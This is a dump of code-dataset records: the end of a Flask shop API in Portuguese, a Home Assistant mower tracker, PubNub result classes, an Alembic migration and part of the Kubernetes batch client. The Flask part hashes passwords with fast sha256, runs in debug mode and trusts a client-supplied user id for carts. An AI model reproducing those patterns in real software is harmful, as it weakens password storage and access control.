date_time_exp = datetime.datetime.strptime(user.passwordResetExpires, '%Y-%m-%d %H:%M:%S.%f')
if datetime.datetime.utcnow() > date_time_exp:
return jsonify({'message' : "Token expirado, gere um novo!"}), 400
if len(str(data['password'])) < 8 or len(str(data['password'])) > 20:
return jsonify({'message' : 'Senha inválida!'}), 400
hashed_newpassword = generate_password_hash(data['password'], method='sha256')
user.password = hashed_newpassword
user.passwordResetToken = None
user.passwordResetExpires = None
db.session.commit()
return jsonify({'message' : "Senha trocada com sucesso!"}), 200
@app.route('/products', methods=['GET'])
@cross_origin(supports_credentials=True)
def get_all_products():
search = request.args.get("search", None)
if not search:
products = Product.query.all()
else:
search = "%{}%".format(search)
products = Product.query.filter(Product.description.like(search)).all()
if not products:
return jsonify([]), 200
product_schema = ProductSchema(many=True)
output = product_schema.dump(products)
return jsonify(output), 200
@app.route('/products/<product_id>', methods=['GET'])
@cross_origin(supports_credentials=True)
def get_product(product_id):
product = Product.query.filter_by(product_id=product_id).first()
if not product:
return jsonify({'message' : 'Produto não encontrado!'}), 400
product_schema = ProductSchema()
output = product_schema.dump(product)
return jsonify(output), 200
@app.route('/cart', methods=['POST'])
@cross_origin(supports_credentials=True)
@token_required
def create_cart(current_user):
data = request.get_json()
cart = Cart(total_amount=data['total'], user_id=data['clientId'])
db.session.add(cart)
db.session.commit()
if not cart:
return jsonify({'message' : 'Problema na inclusão do carrinho'}), 400
for product in data['products']:
if not product:
return jsonify({'message' : 'Problema na inclusão do produto'}), 400
add_product = CP(product_id=product['id'], cart_id=cart.cart_id, quantity=product['quantity'], size=product['size'])
db.session.add(add_product)
db.session.commit()
return jsonify({'message' : 'Carrinho salvo com sucesso!'}), 200
if __name__ == '__main__':
app.run(debug=True) | true | true |
79011b2df9a3b23d72bdc7fb63a4b8022b92a715 | 2,238 | py | Python | custom_components/husqvarna_automower/device_tracker.py | kalhimeo/husqvarna_automower | de513b9ab3ef21fe0a934793aa472f90689b85ce | [
"MIT"
] | null | null | null | custom_components/husqvarna_automower/device_tracker.py | kalhimeo/husqvarna_automower | de513b9ab3ef21fe0a934793aa472f90689b85ce | [
"MIT"
] | null | null | null | custom_components/husqvarna_automower/device_tracker.py | kalhimeo/husqvarna_automower | de513b9ab3ef21fe0a934793aa472f90689b85ce | [
"MIT"
] | null | null | null | """Platform for Husqvarna Automower device tracker integration."""
from homeassistant.components.device_tracker import SOURCE_TYPE_GPS
from homeassistant.components.device_tracker.config_entry import TrackerEntity
from homeassistant.helpers.entity import DeviceInfo
from .const import DOMAIN
async def async_setup_entry(hass, entry, async_add_devices) -> None:
"""Setup sensor platform."""
session = hass.data[DOMAIN][entry.entry_id]
async_add_devices(
AutomowerTracker(session, idx) for idx, ent in enumerate(session.data["data"])
)
class AutomowerTracker(TrackerEntity):
"""Defining the Device Tracker Entity."""
def __init__(self, session, idx) -> None:
self.session = session
self.idx = idx
self.mower = self.session.data["data"][self.idx]
mower_attributes = self.__get_mower_attributes()
self.mower_id = self.mower["id"]
self.mower_name = mower_attributes["system"]["name"]
self.model = mower_attributes["system"]["model"]
self.session.register_cb(
lambda _: self.async_write_ha_state(), schedule_immediately=True
)
def __get_mower_attributes(self) -> dict:
return self.session.data["data"][self.idx]["attributes"]
@property
def device_info(self) -> DeviceInfo:
return DeviceInfo(identifiers={(DOMAIN, self.mower_id)})
@property
def name(self) -> str:
"""Return the name of the entity."""
return self.mower_name
@property
def unique_id(self) -> str:
"""Return a unique identifier for this entity."""
return f"{self.mower_id}_dt"
@property
def source_type(self) -> str:
"""Return the source type, eg gps or router, of the device."""
return SOURCE_TYPE_GPS
@property
def latitude(self) -> float:
"""Return latitude value of the device."""
lat = self.__get_mower_attributes()["positions"][0]["latitude"]
return lat
@property
def longitude(self) -> float:
"""Return longitude value of the device."""
lon = self.__get_mower_attributes()["positions"][0]["longitude"]
return lon
| 33.402985 | 87 | 0.645666 | from homeassistant.components.device_tracker import SOURCE_TYPE_GPS
from homeassistant.components.device_tracker.config_entry import TrackerEntity
from homeassistant.helpers.entity import DeviceInfo
from .const import DOMAIN
async def async_setup_entry(hass, entry, async_add_devices) -> None:
session = hass.data[DOMAIN][entry.entry_id]
async_add_devices(
AutomowerTracker(session, idx) for idx, ent in enumerate(session.data["data"])
)
class AutomowerTracker(TrackerEntity):
def __init__(self, session, idx) -> None:
self.session = session
self.idx = idx
self.mower = self.session.data["data"][self.idx]
mower_attributes = self.__get_mower_attributes()
self.mower_id = self.mower["id"]
self.mower_name = mower_attributes["system"]["name"]
self.model = mower_attributes["system"]["model"]
self.session.register_cb(
lambda _: self.async_write_ha_state(), schedule_immediately=True
)
def __get_mower_attributes(self) -> dict:
return self.session.data["data"][self.idx]["attributes"]
@property
def device_info(self) -> DeviceInfo:
return DeviceInfo(identifiers={(DOMAIN, self.mower_id)})
@property
def name(self) -> str:
return self.mower_name
@property
def unique_id(self) -> str:
return f"{self.mower_id}_dt"
@property
def source_type(self) -> str:
return SOURCE_TYPE_GPS
@property
def latitude(self) -> float:
lat = self.__get_mower_attributes()["positions"][0]["latitude"]
return lat
@property
def longitude(self) -> float:
lon = self.__get_mower_attributes()["positions"][0]["longitude"]
return lon
| true | true |
79011baab4598fa373dcd41d8b61c572c42d70f8 | 286 | py | Python | pubnub/models/consumer/channel_group.py | 17media/pubnub-python | ee372eec82f16d3a80a4cd027bca8976755b817f | [
"MIT"
] | null | null | null | pubnub/models/consumer/channel_group.py | 17media/pubnub-python | ee372eec82f16d3a80a4cd027bca8976755b817f | [
"MIT"
] | null | null | null | pubnub/models/consumer/channel_group.py | 17media/pubnub-python | ee372eec82f16d3a80a4cd027bca8976755b817f | [
"MIT"
] | null | null | null | class PNChannelGroupsAddChannelResult(object):
pass
class PNChannelGroupsRemoveChannelResult(object):
pass
class PNChannelGroupsRemoveGroupResult(object):
pass
class PNChannelGroupsListResult(object):
def __init__(self, channels):
self.channels = channels
| 17.875 | 49 | 0.772727 | class PNChannelGroupsAddChannelResult(object):
pass
class PNChannelGroupsRemoveChannelResult(object):
pass
class PNChannelGroupsRemoveGroupResult(object):
pass
class PNChannelGroupsListResult(object):
def __init__(self, channels):
self.channels = channels
| true | true |
79011c678e10d54b747fa9d433dcb10ce843865f | 831 | py | Python | migrations/versions/780c29109b25_.py | mutalisk999/Flog | 5d836e26967b39faebdf2d5a2c558316bf93221b | [
"MIT"
] | 1 | 2020-08-24T03:39:52.000Z | 2020-08-24T03:39:52.000Z | migrations/versions/780c29109b25_.py | mutalisk999/Flog | 5d836e26967b39faebdf2d5a2c558316bf93221b | [
"MIT"
] | null | null | null | migrations/versions/780c29109b25_.py | mutalisk999/Flog | 5d836e26967b39faebdf2d5a2c558316bf93221b | [
"MIT"
] | null | null | null | """empty message
Revision ID: 780c29109b25
Revises: 911cc5d772fc
Create Date: 2020-08-30 15:22:15.026266
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "780c29109b25"
down_revision = "911cc5d772fc"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_foreign_key(None, "feedback", "user", ["author_id"], ["id"])
op.drop_column("feedback", "author")
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column("feedback", sa.Column("author", sa.VARCHAR(length=20), nullable=True))
op.drop_constraint(None, "feedback", type_="foreignkey")
# ### end Alembic commands ###
| 26.806452 | 89 | 0.665463 | from alembic import op
import sqlalchemy as sa
revision = "780c29109b25"
down_revision = "911cc5d772fc"
branch_labels = None
depends_on = None
def upgrade():
| true | true |
79011dd3e46a4da63a8123af05f9b59f0d676e6b | 91,264 | py | Python | kubernetes/client/apis/batch_v1_api.py | iguazio/python | c2684bb479d44a49a2010ec4ede5ffa7b17349dd | [
"Apache-2.0"
] | null | null | null | kubernetes/client/apis/batch_v1_api.py | iguazio/python | c2684bb479d44a49a2010ec4ede5ffa7b17349dd | [
"Apache-2.0"
] | null | null | null | kubernetes/client/apis/batch_v1_api.py | iguazio/python | c2684bb479d44a49a2010ec4ede5ffa7b17349dd | [
"Apache-2.0"
] | 1 | 2019-01-10T11:13:52.000Z | 2019-01-10T11:13:52.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..api_client import ApiClient
class BatchV1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_namespaced_job(self, namespace, body, **kwargs):
"""
create a Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_job(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_namespaced_job_with_http_info(namespace, body, **kwargs)
else:
(data) = self.create_namespaced_job_with_http_info(namespace, body, **kwargs)
return data
def create_namespaced_job_with_http_info(self, namespace, body, **kwargs):
"""
create a Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_job_with_http_info(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'include_uninitialized', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_job`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_namespaced_job(self, namespace, **kwargs):
"""
delete collection of Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_job(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_collection_namespaced_job_with_http_info(namespace, **kwargs)
else:
(data) = self.delete_collection_namespaced_job_with_http_info(namespace, **kwargs)
return data
def delete_collection_namespaced_job_with_http_info(self, namespace, **kwargs):
"""
delete collection of Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_job_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'include_uninitialized', 'pretty', '_continue', 'field_selector', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_job(self, name, namespace, **kwargs):
"""
delete a Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_job(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param V1DeleteOptions body:
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_namespaced_job_with_http_info(name, namespace, **kwargs)
else:
(data) = self.delete_namespaced_job_with_http_info(name, namespace, **kwargs)
return data
def delete_namespaced_job_with_http_info(self, name, namespace, **kwargs):
"""
delete a Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_job_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param V1DeleteOptions body:
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty', 'body', 'dry_run', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_namespaced_job`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
if 'grace_period_seconds' in params:
query_params.append(('gracePeriodSeconds', params['grace_period_seconds']))
if 'orphan_dependents' in params:
query_params.append(('orphanDependents', params['orphan_dependents']))
if 'propagation_policy' in params:
query_params.append(('propagationPolicy', params['propagation_policy']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_api_resources(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_api_resources(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: V1APIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_api_resources_with_http_info(**kwargs)
return data
def get_api_resources_with_http_info(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_api_resources_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: V1APIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1APIResourceList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_job_for_all_namespaces(self, **kwargs):
"""
list or watch objects of kind Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_job_for_all_namespaces(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1JobList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_job_for_all_namespaces_with_http_info(**kwargs)
else:
(data) = self.list_job_for_all_namespaces_with_http_info(**kwargs)
return data
def list_job_for_all_namespaces_with_http_info(self, **kwargs):
"""
list or watch objects of kind Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_job_for_all_namespaces_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
